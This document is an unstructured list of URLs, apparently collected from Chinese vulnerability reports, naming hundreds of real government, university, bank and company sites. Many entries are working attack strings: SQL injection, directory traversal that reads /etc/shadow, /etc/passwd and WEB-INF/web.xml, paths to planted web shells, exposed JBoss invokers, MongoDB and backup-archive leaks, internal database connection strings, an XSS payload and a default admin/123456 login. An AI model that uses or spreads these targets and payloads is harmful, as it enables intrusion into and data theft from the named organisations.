http://www.sptdch.cn:8080/happy/index.asp http://chati.shiliyiyuan.cn/tjinfo/tjsearch.asp http://xqxtj.com/health/index.asp http://qzhtjktj.com/ardour/index.asp http://www.jyyyw.com:9000/happy/index.asp http://sh.88888719.com/health/index.asp http://www.dazhebei.cn/ardour/index.asp http://www.pmzfy.com/ardour/index.asp http://www.yqtjzx.com/happy/index.asp http://www.xnsdyyy.com/happy/index.asp http://www.zswsxxw.com/happy/index.asp http://www.xy2fytjzx.com/happy/index.asp http://www.xy2fytjzx.com/happy/index.asp http://jkcx.xidian.edu.cn/happy/index.asp http://rcs.zgsyb.com.cn/Reporter/User/Regist.asp http://www.oilphoto.com.cn/index/wdetail?id=1202555 http://iot.189.cn/backendadmin/login.html http://www.libsys.com.cn/huiwen_app_center_2.php http://111.10.24.230:8081/ getshell:http://111.10.24.230:8081/UploadFile/2014/12/01/122932.jsp http://vipcard.petrochina.com.cn:80/ http://111.85.98.165/),"软件下载"处修改文件可下载任意文件。 http://eiabbs.cn/ http://eiabbs.cn/uc_server http://eiabbs.cn/0.php http://eiabbs.cn/phpmyadmin localhost:3307 ip:182.92.1.189 http://htzx.jbedu.net/Code/Common/Navigation.aspx?ModelID=1 http://www.yzzqzx.com/Code/Common/Navigation.aspx?ModelID=1%27%20and%201=@@version-- http://www.jszx.cn/Code/Common/Navigation.aspx?ModelID=1%27%20and%201=@@version-- http://www.zxsdszx.com/Code/Common/Navigation.aspx?ModelID=1%27%20and%201=@@version-- http://www.yzwxzx.net/Code/Common/Navigation.aspx?ModelID=1%27%20and%201=@@version-- http://www.nbyzsy.cn/Code/Common/Navigation.aspx?ModelID=1 http://www.jszx.cn/Code/Common/Navigation.aspx?ModelID=1%27%20and%201=@@version-- http://www.yzzqzx.com/Code/Common/Navigation.aspx?ModelID=1 http://htzx.jbedu.net/Code/Common/Navigation.aspx?ModelID=1 http://www.nbyzsy.cn/Code/Common/Navigation.aspx?ModelID=1 http://www.zxsdszx.com/Code/Common/Navigation.aspx?ModelID=1 http://www.yzwxzx.net//Code/Common/SysCommonAttach.aspx?Method=GetFileList为例: http://www.yzwxzx.net/UpLoad/ElBook/20100304115625376.txt为例: http://www.yzwxzx.net/Code/Common/SysCommonAttach.aspx?Method=DeleteFile&ID=1021 http://www.laoganma.com.cn/c_datapage.jsp?ID=201410232045399236664108530330 http://115.28.38.120:28017/ http://221.228.228.63:28017/ http://www.lbzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://60.171.34.186/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.szzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.ydzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.fcxzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.lbzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.tlzbcg.com/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.sxzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.sixianzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.jzzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.xxzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.hnzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://lbzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://60.171.34.186/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.lbzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://60.171.34.186/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.szzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.ydzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.fcxzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.lbzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.tlzbcg.com/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.sxzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.sixianzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.jzzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.xxzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.hnzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://lbzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://60.171.34.186/CmsNewsController.do?method=downFile&fileUrl=../../../../../etc/shadow&viewName=shadow http://www.cnnb.com.cn/ http://ok.cnnb.com.cn/index.php/Article/view/id/885 https://github.com https://123.56.84.184:4848 http://www.weixinhai.com.cn/details/7/-133 http://www.weixinhai.com.cn/details/7/-133'.html http://**.**.**/ http://tp.xmnn.cn/wj/ http://tp.xmnn.cn/wj/adminlogin.php http://www.sdbys.cn http://202.108.5.43:9977/continuum/security/login.action http://www.chongxin.gansu.gov.cn/siteserver/login.aspx http://www.chongxin.gansu.gov.cn/1.aspx http://www.chongxin.gansu.gov.cn/SiteFiles/TemporaryFiles/contents/1.aspx http://newbbs.play.ifeng.com/uc_server/admin.php http://www.ytkd168.com/Query.asp?id=1313213 http://222.171.176.147/ http://222.171.176.147/VPLMP/tologin.action http://car.yundasys.com/cn/index.php/shopadmin/index.php http://www.11183.com.cn/ec-web/jsp/order/findShiptDetail.action?shipSid=295264 http://211.103.26.116/logs/ http://117.135.147.168/logs/ http://112.91.128.40/include/config.php.bak http://121.14.161.108/include/config.php.bak http://112.91.132.124/include/config.php.bak http://newsys.cheshi.com/soft/upload.php http://0563.gov.cn/data/admin/ver.txt http://ahhnczj.gov.cn/data/admin/ver.txt http://dy.wjjy.gov.cn/data/admin/ver.txt http://en.ljta.gov.cn/data/admin/ver.txt http://eqqh.gov.cn/data/admin/ver.txt http://gslgj.gov.cn/data/admin/ver.txt http://htta.gov.cn/data/admin/ver.txt http://hx.smeqh.gov.cn/data/admin/ver.txt http://jp.ljta.gov.cn/data/admin/ver.txt http://jsjhjw.gov.cn/data/admin/ver.txt http://lnlgb.gov.cn/data/admin/ver.txt http://lywsjd.gov.cn/data/admin/ver.txt http://lyzs.gov.cn/data/admin/ver.txt http://mxmxz.gov.cn/data/admin/ver.txt http://mzcourt.gov.cn/data/admin/ver.txt http://mzsw.gov.cn/data/admin/ver.txt http://mzta.gov.cn/data/admin/ver.txt http://nhzs.gov.cn/data/admin/ver.txt http://nqfda.gov.cn/data/admin/ver.txt http://ofa.lyg.gov.cn/data/admin/ver.txt http://sdnf.gov.cn/data/admin/ver.txt http://touzi.gov.cn/data/admin/ver.txt http://wjj.lyg.gov.cn/data/admin/ver.txt http://www.0563.gov.cn/data/admin/ver.txt http://www.0735.gov.cn/data/admin/ver.txt http://www.360.gov.cn/data/admin/ver.txt http://www.ahww.gov.cn/data/admin/ver.txt http://www.ally.gov.cn/data/admin/ver.txt http://www.aqws.gov.cn/data/admin/ver.txt http://www.cbdj.gov.cn/data/admin/ver.txt http://www.cdqc.gov.cn/data/admin/ver.txt http://www.cqan.gov.cn/data/admin/ver.txt http://www.csp.gov.cn/data/admin/ver.txt http://www.czw.gov.cn/data/admin/ver.txt http://www.dts.gov.cn/data/admin/ver.txt http://www.dzjw.gov.cn/data/admin/ver.txt http://www.dznw.gov.cn/data/admin/ver.txt http://www.eqqh.gov.cn/data/admin/ver.txt http://www.ffkj.gov.cn/data/admin/ver.txt http://www.frny.gov.cn/data/admin/ver.txt http://www.gsds.gov.cn/data/admin/ver.txt http://www.gxmj.gov.cn/data/admin/ver.txt http://www.gxws.gov.cn/data/admin/ver.txt http://www.gzqx.gov.cn/data/admin/ver.txt http://www.hfsf.gov.cn/data/admin/ver.txt http://www.hnmw.gov.cn/data/admin/ver.txt http://www.htta.gov.cn/data/admin/ver.txt http://www.jgip.gov.cn/data/admin/ver.txt http://www.jjq.gov.cn/data/admin/ver.txt http://www.jlmj.gov.cn/data/admin/ver.txt http://www.jmdj.gov.cn/data/admin/ver.txt http://www.jnql.gov.cn/data/admin/ver.txt http://www.jyei.gov.cn/data/admin/ver.txt http://www.jynw.gov.cn/data/admin/ver.txt http://www.lagm.gov.cn/data/admin/ver.txt http://www.lyyy.gov.cn/data/admin/ver.txt http://www.mseq.gov.cn/data/admin/ver.txt http://www.mzsw.gov.cn/data/admin/ver.txt http://www.mzta.gov.cn/data/admin/ver.txt http://www.nhzs.gov.cn/data/admin/ver.txt http://www.payx.gov.cn/data/admin/ver.txt http://www.qjcl.gov.cn/data/admin/ver.txt http://www.rkz.gov.cn/data/admin/ver.txt http://www.sdip.gov.cn/data/admin/ver.txt http://www.sdsg.gov.cn/data/admin/ver.txt http://www.shjs.gov.cn/data/admin/ver.txt http://www.snpc.gov.cn/data/admin/ver.txt http://www.suma.gov.cn/data/admin/ver.txt http://www.sxkx.gov.cn/data/admin/ver.txt http://www.szxx.gov.cn/data/admin/ver.txt http://www.tghl.gov.cn/data/admin/ver.txt http://www.tiyu.gov.cn/data/admin/ver.txt http://www.tjxq.gov.cn/data/admin/ver.txt http://www.whxc.gov.cn/data/admin/ver.txt http://www.wlds.gov.cn/data/admin/ver.txt http://www.wmnj.gov.cn/data/admin/ver.txt http://www.wnzx.gov.cn/data/admin/ver.txt http://www.wxjc.gov.cn/data/admin/ver.txt http://www.wxxw.gov.cn/data/admin/ver.txt http://www.wysi.gov.cn/data/admin/ver.txt http://www.wzta.gov.cn/data/admin/ver.txt http://www.xakh.gov.cn/data/admin/ver.txt http://www.xgjw.gov.cn/data/admin/ver.txt http://www.xpjm.gov.cn/data/admin/ver.txt http://www.xxga.gov.cn/data/admin/ver.txt http://www.xzsn.gov.cn/data/admin/ver.txt http://www.zbcy.gov.cn/data/admin/ver.txt http://www.zprk.gov.cn/data/admin/ver.txt http://www.zqjx.gov.cn/data/admin/ver.txt http://wxd.xa.gov.cn/data/admin/ver.txt http://xakh.gov.cn/data/admin/ver.txt http://xxh.nlk.gov.cn/data/admin/ver.txt http://xycbb.gov.cn/data/admin/ver.txt http://zsyz.pjw.gov.cn/data/admin/ver.txt http://zt.shaxi.gov.cn/data/admin/ver.txt http://111.13.53.132:7180/ http://111.13.53.132:7180/cmf/express-wizard/hosts http://eb.kaiyuanhotels.com/fwActivity/showList.htm?redirectAction:http://d.cn%23 se-extension://ext-1055834318/signin.html http://106.3.41.83:28017/ http://%s.baidu.com:%d/%s http://nzc.iap.ac.cn:8080/news.jsp?lng=c&opr=view&id=345 http://60.191.239.107/ http://202.85.222.170/login.html http://202.85.222.170:28017/ http://www.80ydw.com/movie/693.html http://hpa.pw/HHH http://hpa.pw/HHH的全文代码,会发现这个页面会跳转到http://221.233.160.110/images/xml.html http://dlsw.br.baidu.com/ditui/BaiduYouQianPartPackSilent_1.1.0.10_150946.exe,没错,来自百度有钱联盟的144MB的安装包。 http://www.saclub.com.cn/ http://www.saclub.com.cn/forgotCheck.do http://localhost/dz3.2_wwwroot/home.php?mod=space&uid=2&do=album&id=1 http://localhost/dz3.2_wwwroot/home.php?mod=space&uid=3&do=album&id=2 http://www.rhxwl.com/Server.asp http://www.sxpjgtmyjj.com/bszl/view.asp?id=6900 http://jh.zjmy.net/bszl/view.asp?id=6900 http://xc.xsunion.com/bszl/view.asp?id=6900 http://www.xsunion.com/bszl/view.asp?id=6900 http://xc.xsunion.com/bszl/view.asp?id=6900 http://www.lndca.gov.cn/plugins/1/AspxSpy.aspx http://xtfc.gov.cn/SiteServer/chd/upload/Fuck.aspx http://ajj.zhengzhou.gov.cn/ajj/index.jsp http://www.lndca.gov.cn http://wlxt.whut.edu.cn/new/%E6%A0%B9%E7%9B%AE%E5%BD%95%E6%96%87%E4%BB%B6%E5%A4%B9/1.aspx http://arts.hkbu.edu.hk/~upload/222.aspx http://jpkc.whmc.edu.cn/upload/users/system/JspSpy.jsp http://data.irr.zufe.edu.cn/record/help.jsp http://manage.soku.com http://211.151.146.96:81/WEB-INF/web.xml xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance http://java.sun.com/xml/ns/javaee xmlns:web="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd https://wiki.jasig.org/display/CASC/CAS+Client+for+Java+3.1 http://manage.soku.com http://211.151.146.96:8080/login http://10.103.51.107 http://shuili.enping.gov.cn:8000/Web/ContentDetail.aspx?id=6549 http://bce.baidu.com/.svn/entries http://180.149.144.214:8000/.svn/entries http://112.95.238.211:8080/ http://114.80.69.249:8070/Log/ http://supplier.sinopec.com:9001/RegInformationAction.do http://admissions.shisu.edu.cn/swweb/WEB-INF/gr.xml http://api.bdqn.cn//services/post/noteform http://gs.hust.edu.cn/listNews.do?where=smclsID=63 http://www.yzsgaj.gov.cn http://ll.yzsgaj.gov.cn http://www.yzglj.com/ http://www.ninyuan.gov.cn/ http://www.qy.gov.cn/ http://www.yzsgjj.gov.cn/ http://www.dx.gov.cn/ http://sjj.dx.gov.cn/ http://www.lst.gov.cn http://www.cnll.gov.cn http://jsw.lanshan.gov.cn/ http://da.yzsgaj.gov.cn http://www.lanshan.gov.cn http://www.axdjw.gov.cn http://www.yzjy.net:8080/ http://xsgygl.xmut.edu.cn http://www.cdfxds.com/ http://www.yzglj.com/cmsfile/extends/link/ajax.aspx?parentList=parentList&pid=&time=1417509866303 http://www.cnll.gov.cn/cmsfile/extends/link/ajax.aspx?parentList=parentList&pid=&time=1417509866303 http://www.dx.gov.cn/cmsfile/ajaj/content.aspx?oper=ajaxViewCount&id=convert%28int,user%29&cType=article&time=1417509887642 http://www.yzglj.com/cmsfile/ajaj/content.aspx?oper=ajaxViewCount&id=convert%28int,user%29&cType=article&time=1417509887642Id http://ll.yzsgaj.gov.cn/cmsfile/fckeditor//editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../..%2f https://113.108.232.152:4848 http://service.js.10086.cn/#home http://www.qlxj.gov.cn http://www.lhjw.gov.cn http://www.jjwomen.org http://www.jjqjcy.gov.cn http://www.tzlgb.gov.cn http://dns6.90576.com/tzqf/ https://uhost.ucloud.cn http://ekt1.wangqi.com/iframe_brief.php?style_id=1131202&language=cn http://ekt1.wangqi.com/iframe_brief.php?style_id=1131202%20and%201=1&language=cn http://ekt1.wangqi.com/iframe_brief.php?style_id=1131202%20and%201=11&language=cn index.php/shopadmin/index.php?app=site&ctl=admin_explorer_theme&act=save_image http://shop.xxx.com/index.php/shopadmin/index.php?app=site&ctl=admin_theme_widget&act=preview&theme=ecstore&file=../../../../../etc/passwd http://219.134.88.6 http://www.vlinkage.com http://www.chiscdc.com/ http://www.shhgzf.com:8280/index.asp http://221.230.140.60:8080/index.asp http://218.93.201.187:8888/index.asp http://221.230.8.231:8081/ http://222.184.250.2:8001/ http://58.211.131.154:84/ http://58.221.214.82:82/ http://58.214.247.138:8088/indextjgr.asp http://yianjkong.vicp.cc:8081/index.asp http://www.szcdc.cn/wstjnew/index.asp http://58.221.214.82:82/为例 http://58.221.214.82:82 intitle:mongod inurl:28017 intitle:mongod inurl:28017 www.ztemall.com http://218.30.99.121/biz/login.action http://keyan.sufe.edu.cn/business/oa/download.download?id=45 http://ecampus.sysu.edu.cn/ky/business/oa/download.download?id=45 http://59.72.0.2/business/oa/download.download?id=45 http://mimmo.sdo.com/config/config_ucenter.php.bak备份文件 http://mimmo.sdo.com/source/plugin/pcmgr_url_safeguard/url_api.inc.php http://xbhg.cnpc.com.cn/ http://xbhg.cnpc.com.cn/ExtranetWeb/loginDo.do jdbc:oracle:thin:@10.88.182.5:1521:orcl jdbc:oracle:thin:@//10.21.24.30:1526/wwwdb www.guh-software.de http://121.207.243.91:8001/web/login http://erp.fang.com/article.aspx?aid=117 http://card.cnki.net/orderCard.action site:ydyzc.hnedu.cn inurl:twc_user/twc.do?status=viewCollege http://ydyzc.hnedu.cn/twc_user/twc.do?status=viewCollege&begin=1&page=60&t=8969 http://www.codoon.com/feed/get_praise_feed?feed_id=赞ID&value=1 www.fangjia.com http://www.cchve.com.cn/hep/plugin/gaozhi/index/index.jsp http://kejichu.zhbit.com:9090/CMS/main/showStatistics.action?year=2013 http://kejichu.zhbit.com:9090/CMS/main/activeFileList.action?keyword= http://job.cnooc.com.cn/psearchj.asp?gzdd=0&job=0&what='&date=锟斤拷锟斤拷 http://lining.hftnet.com/Navigation.aspx http://lining.hftnet.com/Login.aspx http://ppt.edri.sinopec.com:80/CN/item/downloadFile.jsp?filedisplay=../../WEB-INF/web.xml http://gj.hn118114.cn http://117.139.74.33/lshr/ http://**.**.**/ https://github.com/map612/statistic/blob/df682ba87f3fa2f69e1fa5d5da3e3727ab3855e2/src/main/java/com/common/mail/mail.properties http://124.88.215.126/logout.shtml url:http://www.corriere.it/clickregister/ClickElementInfo.action http://120.35.26.113:19994/crm/ http://www.sxcw.com/jjjc/news.asp?id=351 http://www.eszfdc.gov.cn/page/create_fin.asp?id=2633 http://corp.1disk.cn/index.aspx http://x.zgyd.org/auppub/2012/04/21/832/0111.jpg http://fjhw.com.cn:8080/admin/login.php http://223.203.209.148/ http://222.73.2.200:8011/ http://www.shenhoulong.com/SHLCMS42/ http://119.147.161.103:7180/ http://124.119.97.2:8081/default.aspx http://60.13.227.250:8082/default.aspx http://lntjs.vicp.net/fgfw-detail.asp?NewsID=1 http://113.106.93.207/ http://www.softtone.cn//softwarer/Admin/login.asp http://120.196.134.134/softwarer/Adm http://adidas.hftchina.cn/ http://adidasbbs.hftchina.cn/ http://adidasbbs.hftchina.cn/admin/index.aspx http://adidasbbs.hftchina.cn/admin/asp.asp http://www.cmread.com/,来到移动和阅读网站,点击听书,进入到移动听书频道,如图所示: http://www.cmread.com/www/listenbookplay?&bid=396591468&cid=396591471&formPage=freeBook网址进入播放器的框架浏览界面进行播放,如图所示: http://yn10010.com/www.rar http://zixun.ehaier.com/ http://zixun.ehaier.com/wp-content/themes/radius/404.php http://job.shenzhenair.com http://job.shenzhenair.com/interface/download/file/LzIwMTQtMTAtMjgvZmlsZS9zcmMvNGIzOTY3Yjc5ZDMzZmYyYTUwLmRvYw,,/name/MjAxNeagoeWbreaLm-iBmOe7iOWuoemAmuefpe-8iOesrOWbm-aJue-8iS5kb2M,/ http://job.shenzhenair.com/interface/download/file//2014-10-28/file/src/4b3967b79d33ff2a50.doc/name/2015校园招聘终审通知(第四批).doc/ http://www.wooyun.org/bugs/wooyun-2014-085759 http://0so.so http://saiqi.0so.so/denglu/login.aspx http://saiqi.0so.so/denglu/index.aspx?username=%E6%9D%8E%E9%82%B5%E5%90%8C&userpass=123456&userid=1 http://booking.mz16.cn/wp-admin/ http://bbs.91w.cc http://www.163.com//13230455278@163.com http://blog.sina.com.cn/ jboss:http://olms.sinopec.com:80/invoker/JMXInvokerServlet http://edcard.sinopec.com:80/invoker/JMXInvokerServlet http://116.228.70.245:8088/it/ip/web/interactiveplatform/equipmentreport/ProcessReport/ER_SearchAllReport.aspx ip:61.129.34.60 http://dhs.21vianet.com/dhs/site0.php?ID=55 http://www.0437.gov.cn/1.rar http://www.ahpfpc.gov.cn/1.rar http://www.ahsz.gov.cn/1.rar http://www.bbcg.gov.cn/wwwroot.rar http://www.bbsti.gov.cn/1.zip http://www.bbsti.gov.cn/bbsti.gov.cn.zip http://www.bdhxq.gov.cn/bdhxq.rar http://www.bdhxq.gov.cn/bdhxq.zip http://www.bjmf.gov.cn/a.rar http://www.cnci.gov.cn/1.rar http://www.cqnagt.gov.cn/www.rar http://www.cqyzfy.gov.cn/cqyzfy.rar http://www.cshb.gov.cn/1.rar http://www.czepb.gov.cn/czepb.rar http://www.czfdc.gov.cn/1.rar http://www.dlhitech.gov.cn/db.rar http://www.dxjfj.gov.cn/dxjfj.rar http://www.dyqwj.gov.cn/dyqwj.rar http://www.dyty.gov.cn/dyty.rar http://www.dzjw.gov.cn/1.rar http://www.fxgjj.gov.cn/1.rar http://www.gaoqing.gov.cn/gaoqing.rar http://www.gdwsxf.gov.cn/www.gdwsxf.gov.cn.rar http://www.gdwsxf.gov.cn/www.rar http://www.gdzl.gov.cn/data.rar http://www.glj.hnloudi.gov.cn/template.rar http://www.gxdzzl.gov.cn/gxdzzl.rar http://www.gxxy.gov.cn/wwwroot.rar http://www.gzpf.gov.cn/gzpf.gov.cn.zip http://www.gzsmzt.gov.cn/test.zip http://www.haiyan.gov.cn/test.zip http://www.hebroads.gov.cn/hebroads.gov.cn.rar http://www.hfjjzd.gov.cn/1.rar http://www.hflib.gov.cn/hflib.rar http://www.hfyl.gov.cn/1.zip http://www.hljda.gov.cn/1.rar http://www.hndt.gov.cn/hndt.rar http://www.hnforestry.gov.cn/hnforestry.rar http://www.hnsfj.gov.cn/hnsfj.rar http://www.hnst.gov.cn/1.zip http://www.hsepb.gov.cn/test.rar http://www.hzjj.gov.cn/wwwroot.rar http://www.jata.gov.cn/jata.rar http://www.jhrf.gov.cn/jhrf.gov.cn.rar http://www.jhrf.gov.cn/jhrf.rar http://www.jinyun.gov.cn/1.rar http://www.jxjt.gov.cn/data.rar http://www.ljxw.gov.cn/ljxw.gov.cn.rar http://www.lnwater.gov.cn/lnwater.rar http://www.luozhuang.gov.cn/1.rar http://www.lygfy.gov.cn/lygfy.rar http://www.lyjs.gov.cn/lyjs.zip http://www.lzanning.gov.cn/test.rar http://www.nbedu.gov.cn/1.rar http://www.nbmz.gov.cn/1.rar http://www.nbmz.gov.cn/1.zip http://www.ngxfw.gov.cn/ngxfw.gov.cn.rar http://www.ningxiangjcy.gov.cn/data.rar http://www.njpf.gov.cn/njpf.rar http://www.nlk.gov.cn/template.zip http://www.nmgdj.gov.cn/test.zip http://www.nmgsft.gov.cn/1.zip http://www.nqjh.gov.cn/1.zip http://www.nqnj.gov.cn/nqnj.rar http://www.nssh.gov.cn/template.rar http://www.paly.gov.cn/template.rar http://www.ptfwzx.gov.cn/wwwroot.rar http://www.qdeic.gov.cn/data.rar http://www.qhdwj.gov.cn/test.rar http://www.qhga.gov.cn/template.rar http://www.qzzx.gov.cn/www.qzzx.gov.cn.rar http://www.rzhb.gov.cn/rzhb.rar http://www.sfjd.gov.cn/sfjd.gov.cn.rar http://www.sm.fjaic.gov.cn/a.rar http://www.smenmg.gov.cn/data.rar http://www.smeyl.gov.cn/smeyl.rar http://www.sxch.gov.cn/a.rar http://www.sxsfpb.gov.cn/template.rar http://www.sydd.gov.cn/1.rar http://www.sygzw.gov.cn/1.rar http://www.szepb.gov.cn/szepb.rar http://www.taishanwj.gov.cn/wwwroot.rar http://www.tlepb.gov.cn/wwwroot.rar http://www.tzb.fy.gov.cn/data.rar http://www.tzty.gov.cn/tzty.zip http://www.wcb.yn.gov.cn/1.rar http://www.wdrc.gov.cn/1.rar http://www.wzmz.gov.cn/wzmz.rar http://www.wzta.gov.cn/data.rar http://www.xcagri.gov.cn/data.rar http://www.xcrs.gov.cn/template.rar http://www.xdrc.gov.cn/wwwroot.rar http://www.xjhbk.gov.cn/1.rar http://www.xnzg.gov.cn/xnzg.gov.cn.zip http://www.xqw.gov.cn/xqw.rar http://www.yc.gov.cn/1.rar http://www.yhgq.gov.cn/yhgq.rar http://www.yixian.gov.cn/root.zip http://www.yulin.gov.cn/a.zip http://www.yxjjj.gov.cn/wwwroot.rar http://www.yxlyj.gov.cn/yxlyj.rar http://www.zjkyx.gov.cn/zjkyx.rar http://www.zsghj.gov.cn/db.rar http://www.nqu.edu.tw/cht/index.php?code=list&flag=detail&ids=12&article_id=23431 http://www.nqu.edu.tw/phpmyadmin/ http://www.oilphoto.com.cn/index/wanu?action=show&id=26 http://xxx.com/emaillist/cancelmail.php?u_mail=1&token=,其中u_mail=1存在注入漏洞 http://my-learning.mindray.com http://192.168.1.24/webmail/client/mail/index.php?module=operate&action=attach-img-preview&d_url=1.gif&type=application/octet-stream http://lz.tjglj.com/index.html http://www.guobin.net/admin/upfile/uppdf.asp http://58.215.137.246/ http://economy.nankai.edu.cn/ http://my.csdn.net/baidu_24193625 http://120.202.17.142/woms/ inurl:/opac/search.php,影响范围很大 http://120.195.143.181:9090/opac/search.php http://120.195.143.181:9090/opac/openlink.php?strText=sssssssssssssss&doctype=ALL&strSearchType=title&match_flag=forward&displaypg=20&sort=CATA_DATE&orderby=desc&showmode=list&location=ALL ftp://www.51fanfan.cn/ www.bilibili.com http://ife.airchina.com/webapps/HAWAII/download.php?filename=../../../../../etc/passwd url:http://xzsp.forestry.gov.cn:8088/pubnet/home.do url:http://oa.mendale.com:89/m1/login.do http://oa.mendale.com:89/m1/login.do http://blog.sohu.com/s/MTg0NjgxNTA2/entry/ http://www.atwasoft.com/ http://www.atwasoft.com:8080/monitor/extview/ http://nlp.ict.ac.cn/project/zhuanyijia/index.php/Index/login.html web3.sdufe.edu.cn/jike web3.sdufe.edu.cn/jike/siteserver/login.aspx http://221.6.246.117/ url:http://www.sinomach.com.cn/web.rar http://demo.kesioncms.com url:http://demo.kesion.com/html/xwpd/gn/2629.html http://demo.kesion.com/plus/digmood/Comment.asp?Action=WriteSave&ChannelID=1&InfoID=2629&C_Content=TEST&AnounName=paultest&Pass=91e31e2ef2076caf&sC_Content=TEST&SubmitComment=%u786E%u8BA4%u53D1%u8868&_=1417434539341 http://demo.kesion.com/plus/digmood/Comment.asp?Action=WriteSave&ChannelID=1&InfoID=2629&C_Content=TEST&AnounName=admin&Pass=91e31e2ef2076caf&sC_Content=TEST&SubmitComment=%u786E%u8BA4%u53D1%u8868&_=1417434539341 http://demo.kesion.com/html/xwpd/gn/2629.html http://119.253.41.10:8018/U8SL/Login.aspx http://xinwen.nwu.edu.cn/ http://www.fsnhyyjt.com/login.action http://testwww.xiamenair.com:1212/specialoffers/detail?guid=d19c4ab4-4851-4348-9f71-089408cf99cd http://ec.sgeg.shenhuagroup.com.cn/news/index.jsp?ins_id=1840&cg_name=gonggao1 http://zx.xj169.com/web/getSmsPwdCode.action http://114.251.1.140/gps/login.jsp user:admin password:123456 http://fzf.vastpay.cn/login.action http://www.ltt-hna.com:80/ www.ltt-hna.com http://hb.lawyeredu.com/common/index.pl http://ha.lawyeredu.com/manager/common/login.pl http://dg.lawyeredu.com/common/index.pl http://wzjc.lawyeredu.com/common/index.pl http://wz.lawyeredu.com/common/index.pl http://nj.lawyeredu.com/common/index.pl http://gx.lawyeredu.com/common/index.pl http://cc.lawyeredu.com/common/index.pl http://hi.lawyeredu.com/common/index.pl http://cq.lawyeredu.com/common/index.pl http://114.251.15.2/gams/login.php http://114.251.15.2/gams/login.php http://www.gxkjks.com/Web_Org/PxShop_Index.aspx?publishingid=106 http://www.ndddpx.com/Web_Org/PxShop_Index.aspx?publishingid=106 http://www.jzkjpx.cn/Web_Org/PxShop_Index.aspx?publishingid=106 http://webcourse.vixue.net/Web_Org/PxShop_Index.aspx?publishingid=106 http://www.fenghuaedu.net/Web_Org/PxShop_Index.aspx?publishingid=106 http://www.zhiyuan-peixun.com/Web_Org/PxShop_Index.aspx?publishingid=106 http://www.gd-jxjy.com/Web_Org/PxShop_Index.aspx?publishingid=106 http://px2.timber2005.com/Web_Org/PxShop_Index.aspx?publishingid=106 http://www.ylscjb.cn/Web_Org/PxShop_Index.aspx?publishingid=106 https://ieeetv.ieee.org/page404.action;jsessionid=C8745BD163B5F68088E4C22DE2149FBB http://xzk.d1xz.net/album/a227/s0/t0 http://course1.jincin.com/course.htm?courseId=1330 ip:111.161.126.181 http://61.187.92.238:8105/CxCMS/index.php/Detailb/index?id=38&aid=293 http://61.187.92.238:8280/jgxy/index.php?m=News&a=detail&showid=208&id=185 ip:106.3.36.238 http://cx.jszg.haedu.cn/jszgcsjgcx.aspx http://60.208.106.165:8002/login www.xxx.com/do.php?act=user_favorite_del,POST的内容中有个参数favorite,存在注入。 http://shpd.jcrb.com/detail.php?id=1&infoid=1166&en=c http://m.jiayuan.com/ http://60.191.53.126:8080/amount/bak.jsp http://iot.189.cn/backendadmin/login.html http://www.zzjtysj.gov.cn/sec.php http://hysslj.gov.cn/ http://hysslj.gov.cn/uploads/test77.PHp http://www.jiuxindai.com/ http://ebank.spdb.com.cn/net/gb/www/perLogoURL.jsp?id=%27;alert%281%29;%27 http://www.milord.com.cn/ http://www.milord.com.cn/UserLogin.aspx www.milord.com.cn http://www.milord.com.cn http://ec.sgeg.shenhuagroup.com.cn/20131113/ http://sgeg.eccl.com.cn/vendorLogin!input.action ip:106.3.38.38 www.zzyedu.org/University/news.asp?class2id=138 inurl:www.uxin.com/pcpage2.0/ http://www.uxin.com/pcpage2.0/newpay.php?uid=70924284&pwd=769c005e493d128ce7ca6c97bc648d62 VERSION:1.2.3 http://mock.tdx.com.cn/log.aspx 